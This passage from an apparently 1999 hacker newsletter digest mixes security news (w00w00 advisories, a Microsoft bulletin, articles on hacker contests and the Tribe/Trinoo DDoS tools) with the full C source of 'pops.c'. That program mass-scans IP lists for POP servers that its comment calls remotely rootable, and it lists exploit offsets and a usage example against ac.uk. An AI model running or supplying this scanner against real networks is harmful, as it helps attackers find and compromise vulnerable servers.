Venezuelan magazine Hven ezine issue #2 has also been
released. Yes, it is in Spanish.
Digital Defiance
http://digital-defiance.hypermart.net/zine.html
Hven ezine
http://www.hven.com.ve
@HWA
18.0 Digi.no publishes Script Kiddie Rant
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by aka
Respected online Norwegian news source Digi.no has
published an interview with a member of the group
"Hackers Online Norway" known as Spectom. The
interview claims that the group is planning to enter the
stock market and is looking for new members. Members
must pass a test of knowledge and break into a site for
membership. (It is unfortunate that a respected
magazine such as Digi.no would publish what appears to
be the rantings of a wannabe script kiddie.)
Digi.no - Norwegian
http://www.digi.no/digi98.nsf/pub/dd19991218113200TKW2126192111
Anyone want to send in a translation of this? - Ed
@HWA
19.0 w00w00 Con 1999
~~~~~~~~~~~~~~~
Contributed by Duro
w00giving99 is off to a great start. In case you haven't heard the w00
security development team is posting several vulnerabilities along with
exploit code. It is said that on the year 2k they are going to release their
best vulnerability along with the code to exploit it. The w00 team is up to #8
now. check out http://www.w00w00.org/advisories.html for all of the advisories.
The w00 team is doing this in the hopes that the vendors will fix the problem.
In the mean time script kids have fun!
w00w00 Site: http://www.w00w00.org/
@HWA
20.0 pops.c popmail scanner by duro
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/* POPScan QPOP/UCB/SCO scanner by duro
duro@dorx.net
takes list of ip's from stdin
The hosts gathered by this scanner are
almost 100% vulnerable to a remote
root attack. The exploits used to root
the vulnerable machines can all be found by
searching bugtraq. UCB pop is 100% of the
time vulnerable to the qpop exploit (it's a very
old version of qpop). The QPOP version is
filitered to make sure that non-vulnerable
versions do not show up in the scan.
Common offsets for the bsd qpop exploit are:
621, 1500, 500, 300, 900, 0
Example usage:
./z0ne -o ac.uk | ./pops > ac.uk.log &
would scan ac.uk for vulnerabilities.
much help from jsbach
*/
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <signal.h>
int ADMtelnet (u_long, int port);
char domain[50];
int NUMCHILDREN = 150, currchilds = 0; /* change numchildren to taste */
char ip[16];
int temp1 = 0;
void scan(char *ip);
void alrm(void) { return; }
main()
{
while( (fgets(ip, sizeof(ip), stdin)) != NULL)
switch(fork()) {
case 0: {
scan(ip); exit(0);
}
case -1: {
printf("cannot fork so many timez@!@^&\n");
exit(0);
break;
}
default:
{
currchilds++;
if (currchilds > NUMCHILDREN)
wait(NULL);
break;
}
}
}
void scan(char *ip)
{
char printip[16];
struct sockaddr_in addr;
int sockfd;
char buf[512];
bzero((struct sockaddr_in *)&addr, sizeof(addr));
sockfd = socket(AF_INET, SOCK_STREAM, 0);
addr.sin_addr.s_addr = inet_addr(ip);
addr.sin_port = htons(110);
addr.sin_family = AF_INET;
signal(SIGALRM, alrm);
alarm(5);
if ( (connect(sockfd, (struct sockaddr *)&addr, sizeof(addr)) != -1))
{
recv(sockfd, (char *)buf, sizeof(buf), 0);
if ( (strstr(buf, "QPOP") ) != NULL && (strstr(buf, "2.5")) == NULL && (strstr(buf, "krb")) == NULL)
{
checkos(ip,1);
}
if((strstr(buf, "UCB")) != NULL)
checkos(ip,2);
if((strstr(buf, "SCO")) != NULL)
{
strcpy(printip, ip);
if ((temp1=strrchr(printip, '\n')) != NULL)
bzero(temp1, 1);
printf("%s: SCO Unix box running SCO pop.\n",printip);
}
}
return;
}
// }
checkos(char *ip, int spl)
{
int temp2;
char printip[16];
unsigned long temp;
temp = inet_addr(ip);
temp2 = ADMtelnet(temp, 23);
strcpy(printip, ip);
if ((temp1=strrchr(printip, '\n')) != NULL)
bzero(temp1, 1);
if ((temp2 == 1)&&(spl==1))
printf("%s: OpenBSD box running vuln QPOP\n",printip);
if ((temp2 == 1)&&(spl==2))
printf("%s: OpenBSD box running vuln UCB pop\n",printip);
if ((temp2 == 2)&&(spl==1))
printf("%s: FreeBSD box running vuln QPOP\n",printip);
if ((temp2 == 2)&&(spl==2))
printf("%s: FreeBSD box running vuln UCB pop\n",printip);
if ((temp2 == 3)&&(spl==1))
printf("%s: BSDi box running vuln QPOP\n",printip);
if ((temp2 == 3)&&(spl==2))
printf("%s: BSDi box running vuln UCB pop\n",printip);
}
int ADMtelnet (u_long ip, int port)
{
struct sockaddr_in sin;
u_char buf[4000];
int dasock, len;
int longueur = sizeof (struct sockaddr_in);
dasock = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP); /* gimme a socket */
sin.sin_family = AF_INET;
sin.sin_port = htons (port);
sin.sin_addr.s_addr = ip;
if (connect (dasock, (struct sockaddr *) &sin, longueur) == -1)
return (-1);
while (1)
{
memset (buf, 0, sizeof (buf));
if ((len = read (dasock, buf, 1)) <= 0)
break;
if (*buf == (unsigned int) 255)
{
read (dasock, (buf + 1), 2);
if (*(buf + 1) == (unsigned int) 253 && !(u_char) * (buf + 2));
else if ((u_char) * (buf + 1) == (unsigned int) 253)
{
*(buf + 1) = 252;
write (dasock, buf, 3);
}
}
else
{
if (*buf != 0)
{
bzero (buf, sizeof (buf));
read (dasock, buf, sizeof (buf));
usleep(40000);
if((strstr(buf, "OpenBSD") != NULL))
return 1;
if((strstr(buf, "FreeBSD") != NULL))
return 2;
if((strstr(buf, "BSDI") != NULL))
return 3;
sleep (1);
}
}
}
return 0;
}
@HWA
21.0 Cypherpunks meeting announcement
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Join us for the first Cypherpunks meeting of the new millennium!
NEXT Meeting: <http://www.freedomfighter.net/cypherpunks/2000/0115.html>
Meeting Page: <http://www.freedomfighter.net/cypherpunks/physical.html>
SF Bay Area Cypherpunks (80th Chairborne Regiment)
15 Jan 2000 * MEETING PRE-ANNOUNCEMENT
The January 2000 SF Bay Cypherpunks meeting will be on January 15th!
General Info:
For those of you who plan ahead: the January 2000 cypherpunks
physical meeting will be on January 15th, the THIRD SATURDAY of
January, instead of the usual second Saturday. This will align
our meeting with the RSA Data Security Conference in San Jose
the following week (registration starts on 16 Jan). Many of the
usual cypherpunk suspects from around the planet will be in town.
Location:
The meeting will be held in San Jose, a few blocks from the RSA
conference site. Location details to follow.
Time:
Meeting time is 12-6pm, followed by a group dinner nearby from 6-8pm.
Speakers: (so far...)
Cypherpunk Projects: general "Works-in-Progress" session
Bruce Schneier (Counterpane)
Austin Hill (Zero Knowledge)
Paul Holman (Shmoo Group)
Adam Shostack (Zero Knowledge)
Mystery Guest
More Volunteer Speakers are welcome:
Send us your agenda proposal (one brief paragraph,
include amount of time needed, e.g. 5/15/30 minutes).
<mailto:sfbay-cpunks-announce-admin@cryptorights.org?subject=2000-01-15%20agenda%20request>
RSA Conference Vendor Expo Free Registration
The show floor will be open January 18th and 19th at the San Jose
Convention Center. Onsite Expo registration is $50, but it's FREE
if you register NOW at: <http://www.rsasecurity.com/rsa2000>.
Also, you can register for the conference or the IBM gala party
at that site.
@HWA
22.0 Microsoft security bulletin MS99-046 Windows NT 4.0 SP4 or SP5
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The following is a Security Bulletin from the Microsoft Product Security
Notification Service.
Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************
Re-release of Microsoft Security Bulletin MS99-046
--------------------------------------------------
In November, we withdrew a previously released patch that improved the
randomness of TCP initial sequence numbers in Windows NT 4.0. The patch was
withdrawn because it contained the same regression error that was present in
Windows NT 4.0 SP6. We have eliminated the regression error and re-released
the patch. The security bulletin has been updated and is available at
http://www.microsoft.com/Security/Bulletins/ms99-046.asp; the FAQ also has
been updated and is available at
http://www.microsoft.com/Security/Bulletins/ms99-046faq.asp.
All versions of the original patch were affected by the regression error,
although the error only manifested itself in certain situations. When
applying the new patch, it's not necessary to uninstall the original patch
first. Just install the patch as normal. Here's how to determine which
patch to apply:
- If you are running Windows NT 4.0 SP4 or SP5 on an Intel machine, go
to http://www.microsoft.com/Downloads/Release.asp?ReleaseID=16763 and
select q243835sp5i.exe.
- If you are running Windows NT 4.0 SP6 on an Intel machine, go to
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=16764 and
select q243835i.exe.
- If you are running Windows NT 4.0 SP4 or SP5 on an Alpha machine, go
to http://www.microsoft.com/Downloads/Release.asp?ReleaseID=16763 and
select q243835sp5a.exe.
- If you are running Windows NT 4.0 SP6 on an Alpha machine, go
to http://www.microsoft.com/Downloads/Release.asp?ReleaseID=16764 and
select q243835a.exe.
We are very sorry for any inconvenience caused by the regression error, and
will do our best to prevent similar problems in the future. Regards,
The Microsoft Security Response Team
*******************************************************************
You have received this e-mail bulletin as a result of your registration
to the Microsoft Product Security Notification Service. You may
unsubscribe from this e-mail notification service at any time by sending
an e-mail to MICROSOFT_SECURITY-SIGNOFF-REQUEST@ANNOUNCE.MICROSOFT.COM
The subject line and message body are not used in processing the request,
and can be anything you like.
For more information on the Microsoft Security Notification Service
please visit http://www.microsoft.com/security/services/bulletin.asp. For
security-related information about Microsoft products, please visit the
Microsoft Security Advisor web site at http://www.microsoft.com/security.
_____________________________________________________________________
** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice"
** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST"
SEND ALL COMMANDS TO: listserv@listserv.ntsecurity.net
@HWA
23.0 [ISN] Hacker Shootouts?
~~~~~~~~~~~~~~~~~~~~~~~
Forwarded From: darek.milewski@us.pwcglobal.com
NETWORK WORLD FUSION FOCUS: JIM REAVIS on SECURITY
Today's Focus: Hacker shootouts? Not!
12/10/99
By Jim Reavis
I personally like the idea of companies sponsoring hacker challenges,
where a box is set up on the 'Net for ingenious hackers to test their
skills and win a prize. These challenges can be educational - for the
hacker, the sponsor and sometimes for the product vendors as well. I
would like to see more hacker challenges, bugs bounties and crypto
algorithm cracking contests.
However, it is completely irresponsible and unbelievable to see hacker
shootouts that pit one operating system against another. Such was the
case in September when PC Week Labs sponsored HackPCWeek.com, where a
Windows NT server was pitted against a Linux server in a test to find
which operating system was more secure. Unfortunately, these types of
shootouts serve only to obfuscate the real issues of operating system
security, confuse those trying to learn about the technical differences
between the operating systems and further polarize the proponents of Linux
and NT.
Four days after the challenge was initiated, the Linux system was
compromised by an add-on CGI script with improper security checks - not by
the core operating system. In providing an explanation of the hack, PC
Week Labs revealed that they did not install any of the 21 security
patches for Red Hat 6; however they did install Service Pack 5 for NT.
Their reasoning? It was too difficult to install the individual patches,
but Service Pack 5 comes in one easy file.
Their perverse reasoning could be described as defining deviancy down -
systems administrators must be lazy and sloppy so we will be sloppy as
well. PC Week Labs does not seem to be aware that service packs on NT are
not necessarily a systems administrator's paradigm. The service packs are
very famous for fixing some things, but breaking others; consequently,
many systems administrators are more comfortable staying behind a service
pack level and utilizing post-SP hotfixes to take a more targeted approach
to solving problems.
It is clear from PC Week Labs' explanation of their setup rationale that
service packs are an ideal service management solution - that would be
news even to many NT advocates. PC Week Labs is guilty of making unwise
generalizations about how either of the operating systems are or should be
securely implemented.
So what did PC Week Labs prove? As many veterans of the computer security
industry will say, you cannot prove security, only insecurity. Providing
total systems assurance is a complicated process that cannot be emulated
in a contest. When it comes to using any computer system for the purpose
of securing sensitive data, the contribution the technology makes to that
equation pales in comparison to the contribution the people must make.
People make the difference in information security, and a solitary
shootout will do more to establish the competency of the test developers,
not the products themselves. Unfortunately, HackPCWeek.com proved very
little.
What are good hacker challenges to conduct? Vendors that challenge
hackers to find flaws in their own products, or very specific algorithms,
are doing a positive thing. Microsoft, for one, should be applauded for
the Windows 2000 beta test site the firm ran on its own. This is a
terrific way to get the product out of their developers' and beta testers'
hands and into those with the talents to hack NT's vulnerabilities. We
only wish that this effort was more extensive and that Microsoft would
have offered nice rewards to successful participants.
Vulnerabilities found on a beta product in a hacker challenge are
vulnerabilities that won't show up in the released product. Code-breaking
challenges like RSA's Data Encryption Standard challenge are enormously
useful, as they give us concrete data on the amount of processing power
required to crack a widely used crypto algorithm. To be sure, vendors use
marketing spin to claim that their own hacker challenge has proven the
superiority of their own products, but we all know that vendors are
supposed to be biased, and we can filter out the noise. However, contests
from a presumably unbiased authority need to be much more carefully
constructed, and need to have objective goals. Computer magazines have
done competitive product reviews for a long time, and the accepted
protocol is to bend over backwards to be fair. Subjectively patching one
operating system, but not the other, is troubling and damaging to PC Week
Labs' credibility.
There are many IT decision makers who want to get to the facts about which
operating system they should be using now, and in the future. Facts are
sometimes hard to come by, and unfortunately, a hacker shootout does not
provide any facts. A hacker shootout serves only to further polarize the
respective NT and Linux camps. Ultimately, HackPCWeek.com appears to be a
base attempt to capitalize on the Linux-NT debate, without providing
something useful for IT decision makers.
I personally want to see more hacker challenges. Nothing would please me
more than to see talented hackers making a living off of these contests,
while we all learn from the results. What did we really learn from the
HackPCWeek.com exercise? If you are looking to hire a Linux administrator
and you receive a resume listing PC Week Labs as prior experience - you
might want to pass.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
FOR RELATED LINKS -- Click here for Network World's home page:
http://www.nwfusion.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Getting the drop on network intruders, Network World, 10/04/99
http://www.nwfusion.com/reviews/1004trends.html
Hacker alert, Network World, 09/27/99
http://www.nwfusion.com/buzz99/buzzintel.html
Defending against cyberattack, Network World, 08/23/99
http://www.nwfusion.com/news/1999/0823cyberattack.html
Start-up's 'decoy' server helps track down hackers, Network World,
08/09/99
http://www.nwfusion.com/archive/1999/72100_08-09-1999.html
Archive of Network World Fusion Focus on Security newsletters:
http://www.nwfusion.com/newsletters/sec/
Other security-related articles from Network World:
Viruses to crash New Year's bash: Remedies include shutting down e-mail
systems, Network World, 12/6/99
http://www.nwfusion.com/news/1999/1206y2k.html
Network World interview: Cisco's John Chambers, Network World, 12/6/99
http://www.nwfusion.com/news/1999/1206chambers.html
About the author
----------------
Jim Reavis, the founder of SecurityPortal.com
(http://securityportal.com/), is an analyst with over
10 years' experience consulting with Fortune 500 organizations on
networking and security-related technology projects.
Questions or comments?
----------------------
* For editorial comments, write Charley Spektor,
Managing Editor at: cspektor@nww.com
* For advertising information, write Jamie Kalbach,
Account Executive at: jkalbach@nww.com
* For all other inquiries, write Christine Rhoder,
Circulation Marketing Manager at: crhoder@nww.com
Subscription Services
---------------------
You can subscribe or unsubscribe to any of your e-mail newsletters by
updating your form at: http://www.nwfusion.com/focus/subscription.html
For subscription changes that cannot be handled via the web, please send
an email to our customer service dept: listnews@gaeta.itwpub1.com
Network World Fusion is part of IDG.net, the IDG Online Network.
IT All Starts Here: http://www.idg.net
Copyright Network World, Inc., 1999
----------------------------------------------------------------
The information transmitted is intended only for the person or entity to
which it is addressed and may contain confidential and/or privileged
material. Any review, retransmission, dissemination or other use of, or
taking of any action in reliance upon, this information by persons or
entities other than the intended recipient is prohibited. If you received
this in error, please contact the sender and delete the material from any
computer.
ISN is sponsored by Security-Focus.COM
@HWA
24.0 [ISN] 21 yr old secures $53Mil for high-tech startup
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.mercurycenter.com/svtech/news/breaking/merc/docs/004316.htm
PALO ALTO, Calif. (AP) [12.15.99] -- Angus Davis told his parents not
to worry when he was thrown out of the prestigious school Phillips
Academy Andover for hacking into the telephone system.
But even Davis couldn't have predicted that in less than five years he
would leverage his scofflaw talents to secure $53 million in funding
for a company trying to combine the power of the World Wide Web with
the convenience of the telephone.
On Wednesday Davis -- who is barely old enough to pop a bottle of
champagne -- announced that he and his partners a their company,
Tellme Networks Inc., have received $47 million in funding from rival
venture capital firms Benchmark Capital and Kleiner Perkins Caufield &
Byers. The new round of investment brings the company's total funding
to $53 million.
``It's a lot of money,'' said Davis, 21, perched on the bed he has
built above his desk. ``It's a testament to the importance of our
team.''
[...]
==
Some day, on the corporate balance sheet, there will be
an entry which reads, "Information"; for in most cases
the information is more valuable than the hardware which
processes it. -- Adm. Grace Murray Hopper, USN Ret.
==
http://www.dis.org/erehwon/
ISN is sponsored by Security-Focus.COM
@HWA
25.0 [ISN] Netscape Security Flaw Revealed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Forwarded From: "John Q. Public" <tpublic@dimensional.com>
http://www.zdnet.com/zdnn/stories/news/0,4586,2409537,00.html
By Sharon Cleary, WSJ Interactive Edition
December 15, 1999 5:50 AM PT
A software-security firm warned that its researchers have found a
potentially serious security flaw in the e-mail system used by Netscape's
Web browser.
Reliable Software Technologies, a Sterling, Va., software-security
company, said Tuesday that two RST engineers needed just eight hours to
duplicate the mathematical algorithm Netscape Mail uses to scramble users'
passwords. The company said the problem affects all current versions of
Netscape.
Gary McGraw, vice president for corporate technology at RST, said the
Netscape algorithm was "not an obvious sitting duck -- [the password]
appears to be scrambled up in a good way, but it's not cryptographically
strong." That would allow a determined hacker to reverse-engineer the
algorithm and figure out the password.
[...]
Officials of Netscape, now a division of Dulles, Va.-based America Online
Inc. (NYSE: AOL, were concerned by the news but said the unit has no plans
to change its algorithm. [sic, bad parens]
Chris Saito, the senior director for product management at Netscape, said
that the option to save a password locally was included for convenience.
Saito added that Netscape didn't use a stronger encryption algorithm to
protect passwords so that "computer experts could still access the
information, in case someone forgot their password."
[snip]
ISN is sponsored by Security-Focus.COM
@HWA
26.0 [ISN] Cyberterrorism hype
~~~~~~~~~~~~~~~~~~~~~~~~~
Forwarded From: Johan.Ingles@janes.co.uk
http://jir.janes.com/sample/jir0525.html
Document created: 21 OCTOBER 1999
Cyberterrorism hype
With the 1990s propensity to dot.com everything that moves, 'hacking' and
'cyberterrorism' have become subjects of intense media coverage. Almost
daily, hitherto unknown security specialists warn of potential
catastrophes: news that gets picked up by the media and crosses the globe
with impunity. Johan J Ingles-le Nobel discussed the subject with
programmers at Slashdot to profile so-called cyberterrorists and examine
the viability of cyberwarfare.
Cyberterrorism is a buzzword of 1999. Indeed, with the remarkable growth
of the Internet, hacking horror stories have reached new heights of
publicity, leading to a veritable media frenzy. Yet careful examination of
the issue reveals much of the threat to be unsubstantiated rumour and
media exaggeration. The exaggeration is understandable, however - these
technologies underpin our entire society, and what paper can resist
printing a scoop revealing that banks are being blackmailed with threats
of attacks on their computers, or that a military satellite has been
hijacked by hackers? The idea that an anonymous teenager working alone
from his bedroom can wreak electronic havoc on the far side of the world
makes for good press.
What is a hacker?
Nothing gets a hacker's back up quicker than someone confusing a hacker
with cracker. The term 'hacker' refers to an individual who programmes
enthusiastically (even obsessively), enjoys programming or is especially
good at programming; a 'cracker' is somebody who breaks into another's
computer systems or digs into their code (to make a copy-protected
programme run). Yet the boundaries have become somewhat blurred and the
popular understanding of these terms is is quite wrong: ever since
Hollywood produced 'Wargames', based on Kevin Mitnic's cracking activities
(known as 'exploits'), the term 'hacking' has become synonymous with
unauthorised access into restricted systems - which is 'cracking'. In
today's world, such activity also includes the deliberate defacement of
websites. Hackers are quick to point out that there is a code of hacker
ethics that precludes any profit from the activity - the only motive is
the activity itself - but they are not na�ve: realising the potential for
misuse, they divide themselves into 'white-hat' hackers (ethical hackers)
and 'black-hat' hackers (crackers).
According to hackers, 99% of cracking incidents can be blamed on so-called
'script-kiddies'. These are usually young people who manage to acquire
some 'cracking tools' somewhere on the Internet and are keen try them.
They choose a 'cool' target (such as NASA, the Pentagon or the White
House) and launch the tools. Older, more established hackers see them as
upstarts. Think of a kid walking down a corridor testing doorknobs; whilst
they are more than capable of defacing websites such as that of the
Central Intelligence Agency (CIA), their actions are seen as the
equivalent of putting down a whoopie cushion on the chair of the UN
Secretary General - juvenile, noisy and somewhat embarrassing, but
ultimately without real effect. Says Mick Morgan, webmaster to the UK's
Queen Elizabeth: "I have nightmares about waking up to find graffiti
(which is all it is) on one of my customer's sites."
[snip..]
ISN is sponsored by Security-Focus.COM
@HWA
27.0 [ISN] The Beijing Hack Attack
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.worldnetdaily.com/bluesky_exnews/19991216_xex_hack_planet.shtml
HONG KONG -- What do blondes, Jack in the Box tacos and 21st century
cyber-warfare have in common? Everything, apparently, if you're one of
the elite and stealthy soldiers in Hong Kong Blondes' computer hacking
universe.
These committed soldiers are locked in mortal combat with the
government of the People's Republic of China and the transnational
corporations who profit from dealing with it.
"Human rights are a global concern and we have no second thoughts
about attacking the multinational corporations who profit off of the
human rights abuses committed against our Chinese brothers and sisters
by their own government," says Databyte Cowgirl, one of the leaders of
the Hong Kong Blondes.
Along with numerous other members of the Hong Kong Blondes, Databyte
Cowgirl was interviewed by WorldNetDaily over the course of seven
weeks in July and August of 1999, as well as during the past several
weeks.
[...]
==
Some day, on the corporate balance sheet, there will be
an entry which reads, "Information"; for in most cases
the information is more valuable than the hardware which
processes it. -- Adm. Grace Murray Hopper, USN Ret.
==
http://www.dis.org/erehwon/
ISN is sponsored by Security-Focus.COM
@HWA
28.0 [ISN] Most cybercrime goes unpunished
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.ntsecurity.net/forums/2cents//news.asp?IDF=191
WINDOWS SECURITY NEWS 12/20/99
Most Cybercrime Goes Unpunished
Monday, December 13, 1999 - According to a recent article by David Noack,
most cybercrime goes unpunished. And based on the figures presented in
this report, we have to agree. the report states that of 419 cases of
alleged computer fraud referred to federal prosecutors in 1998, only 83
were prosecuted. The remainder were dismissed for lack of evidence. Also
in 1998, 47 people were convicted of federal computer crimes, and 20 were
sent to prison; another 10 were found not guilty.
Anyone who has glanced at the ATTRITION.ORG archives realizes that
these figures are pathetically low compared to the number of computer
crimes that actually occur every day. The report basically leads us to
assume most computer criminal are never reported to authorities--and
perhaps that's because most computer criminals never get caught.
Links: APB News
http://www.apbnews.com/newscenter/internetcrime/1999/12/09/cyberlaws1209_01.html?s=snaph
ISN is sponsored by Security-Focus.COM
@HWA
29.0 [ISN] Jubilant Zhirinovsky wants to hack Western computers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Forwarded From: "Vanna P. Rella" <vamprella@vamprella.com>
http://biz.yahoo.com/rf/991219/dy.html
Sunday December 19, 5:19 pm Eastern Time
Jubilant Zhirinovsky wants to hack Western computers
MOSCOW, Dec 20 (Reuters) - Russia's maverick politician Vladimir
Zhirinovsky, whose ultra-nationalist bloc looks set to do well in a
parliamentary election, said on Monday he would celebrate by hacking into
Western computers.
Zhirinovsky's bloc was running at more than eight percent in early results
compared with pre-election opinion polls which had given him some five
percent. Asked by Reuters whether he would have a drink to mark his
party's good showing, he said:
``No. No way, we Russians don't drink any more. We now work on computers,
we use computers to send viruses to the West and then we poach your
money.''
``We have the best hackers in the world. We do not need to drink or
smoke...We do not drink, smoke, have drugs and we don't have AIDS, that's
what you have got in the West.''
Russia is a heavy drinking nation which is struggling to catch up with
economically-advanced countries on the use of new technologies, such as
the Internet, but a lack of resources and poor infrastructure confines
progress to big cities.
Zhirinovsky who has run and done reasonably well in all parliamentary and
presidential elections since 1991 on a protest vote by lower stratas of
the Russian society, is one of the most eccentric politicians with an
acute political sense and bizarre sense of humour.
He has thrown juice at an opponent in a live televised debate, promised to
wash his boots in the Indian Ocean when Russia expands there and been
involved in fist-fighting in the State Duma lower chamber of parliament.
But at the same time, he has decided crucial votes in parliament in the
Kremlin's favour and has developed a well organised party with solid
assets.
ISN is sponsored by Security-Focus.COM
@HWA
30.0 [ISN] Tribe and Trinoo, two new virulent virii
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Forwarded From: "Noonan, Michael D" <mdn@intel.com>
http://news.cnet.com/news/0-1003-200-1501144.html?tag=st.ne.1002.tgif?st.ne.fd.gif.f
Computer security teams brace for attacks
By Stephen Shankland
Staff Writer, CNET News.com
December 20, 1999, 1:30 p.m. PT
Computer security teams are bracing for holiday attacks by two programs
that enlist multiple systems to launch coordinated assaults on Web
servers.
Concern is mounting that the two malicious programs, called Tribe Flood
Network and Trinoo, will show their colors in coming weeks. Experts fear
that the holidays are a likely time, because computer administrators on
vacation will be harder to locate and likely won't be paying as much
attention to systems under their control.
In addition, some suggest attackers are likely to strike in the midst of
confusion that people expect with the arrival of the Year 2000 computer
problem.
Tribe and Trinoo also may be more powerful than previous programs of the
same kind. The duo, which started appearing in recent months, "are a step
above what has happened before," according to Dave Dittrich, a computer
security technician at the University of Washington who wrote analyses of
the programs.
When installed onto hundreds or thousands of computers, the programs
simultaneously bombard a select point on the Internet. If the information
from the attackers comes fast enough, the target computer freezes up.
Flooding attacks such as Tribe and Trinoo are examples of so-called
denial-of-service attacks, a method that's been around as long as there
have been networks to inundate. And launching attacks from several
computers too has been tried before, for example with the "Smurf" attacks
of last year.
But Tribe and Trinoo give a new level of control to the attacker, and they
are being improved, Dittrich said.
Moreover, because the origin of the program is obscured, it's hard to
counteract, said Quinn Peyton of the Computer Emergency Response Team
(CERT) at Carnegie Mellon University.
"There are machines now sitting there, prepared to attack somebody else,"
Peyton said. "Now one person can do a massive denial-of-service."
CERT warns that the Trinoo and Tribe attack tools "appear to be undergoing
active development, testing and deployment on the Internet."
Tribe Flood Network and Trinoo launch their attacks from a host of
innocent computers that already have been broken into. Then, on a signal
from a master computer, the computers simultaneously bombard the victim
machine with packets of information so fast that it becomes unresponsive.
At that point, the target computer won't respond to commands and can't be
taken off the network.
To monitor computer attacks and vulnerabilities, the FBI in 1998 set up an
office called the National Infrastructure Protection Center (NIPC).
Although FBI officials did not comment on the Tribe or Trinoo attacks, the
FBI is holding a news conference tomorrow about Y2K issues, a spokesman
said.
"There's a lot of paranoia for the Y2K stuff," said David Crawford of the
Energy Department's Computer Incident Advisory Capability.
CIAC is working hard to prepare a description of how to identify Trinoo
and Tribe in the next few days. "We're looking for a unique signature that
will identify these types of attack," he said.
Dittrich might know. He had to respond when 27 computers at his university
were among 227 that attacked the University of Minnesota during three days
in August.
"I was having a hard time finding all the people and getting all the
systems cleaned up," he said, and that was just for the a small fraction
of the systems involved.
"During that time, their network was pretty much unusable for 100,000
users," Dittrich said. "There isn't much of a defense against these
denial-of-service attacks."
University of Washington computers also were used for attacks on computers
in France, Norway and Australia, he said.
The attack software was installed primarily on computers using Sun
Microsystems' Solaris and Linux--both variations of the Unix operating
system. To break into those computers, the intruder took advantage of
known vulnerabilities that allowed him or her to take almost complete
control of a computer then erase his or her tracks, Dittrich said.
"The core message is that people who have systems on the Internet need to
know how to deal with them," Dittrich said. "You can't expect your
computer to be running for years, like a microwave. It's more like a
really expensive car, where you've got to be taking it in for maintenance
all the time."
In the attack on the University of Minnesota, 114 of the 227 attacking
systems were part of the Internet 2, a higher-speed successor to the
current Internet. Using Internet 2 was important, because its higher-speed
network can deliver more volleys in the denial-of-service attack.
"Whoever has the bigger pipe wins," Dittrich said.
ISN is sponsored by Security-Focus.COM
@HWA
31.0 [ISN] As New Year nears, threat of Net attack program mounts
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Forwarded From: darek.milewski@us.pwcglobal.com
As New Year nears, threat of Net attack program mounts
By Stephen Shankland
Staff Writer, CNET News.com
December 23, 1999, 4:00 a.m. PT
URL: http://news.cnet.com/category/0-1003-200-1504709.html
A new and potentially more dangerous version of an Internet attack program
has been posted just in time for the holidays, and another is on the way.
A new version of a malicious program called the Tribe Flood Network (TFN)
is more powerful and harder to detect than an earlier version, according
to experts. And an updated sister program called Trinoo is due to be
released next week.
Few incidences of their use have been publicly acknowledged, but experts
are warning sites to prepare against attacks that may coincide with New
Year's. Widely anticipated problems owing to the Y2K computer glitch may
provide cover for other mischief.
The program works like this: A TFN attacker secretly embeds software into
hundreds of computers. Then, at a selected time, a command is issued that
prompts the infected computers to swamp a target Web site or server with
messages in a method of attack called "denial of service." The program
doesn't damage the "infected" computers or the target, but the sudden
flood of messages typically knocks out the target system.
Although it's possible for target computers to protect themselves by
ignoring messages from attacking computers, it's hard to identify which
computers are attacking--especially when there are hundreds. This
fundamental vulnerability of networked computers makes protecting against
denial-of-service attacks extremely difficult.
The existence of TFN was reported earlier this week. The new variant,
called TFN2K, is potentially more dangerous in that it can enlist machines
based on both the Windows NT and Unix operating systems to deliver the
flood of messages, according to Gia Threatte of the Packet Storm Web site,
which publishes security-related software so system administrators can
protect against attacks and intrusions.
TFN2K also adds the ability to act on a single command, a stealthier mode
of operation than the previous version (which required the controller to
send a password), and encrypts communications, making the infecting
messages harder to detect, Threatte said.
Further, TFN2K sends decoy information to throw hunters looking for the
source off the scent.
The purported author of the TFN family, who goes by the name "Mixter,"
sent a version of TFN2K to Packet Storm. Packet Storm said it also expects
a new version of Trinoo from Mixter.
With the new software being released now and the "2K" allusion to the new
year in the name of the program, it appears that a computer attack could
occur during the holidays.
"I don't really think you're going to see any serious attacks using this
until New Year's," Threatte said. On Jan. 1, though, people likely will
try to "cause a little mischief," she said.
Other security watchers concur. The consensus of a Year 2000 bug workshop
at Carnegie Mellon University's Computer Emergency Response Team was that
"it is possible that intrusion attempts, viruses and other attacks will be
focused on the time around 01 January 2000 under cover of Y2K incidents,"
CERT said.
CERT has warned, "We are receiving reports of intruders compromising
machines and installing distributed systems used for launching
packet-flooding denial-of-service attacks." CERT said that attackers
generally gained unauthorized access to these computers through well-known
weaknesses, reinforcing the message that system administrators must stay
up-to-date on keeping their systems secure.
Detection of attacks and their ultimate source isn't easy. Trinoo and the
TFN family obscure the address of the actual attacker by hiding the person
in control behind two layers of computers. The attacker lays the
groundwork by breaking in to several computers, installing master software
on some and attack software on others. When it's time for the attack, a
message is sent to the master computers, which in turn is relayed to the
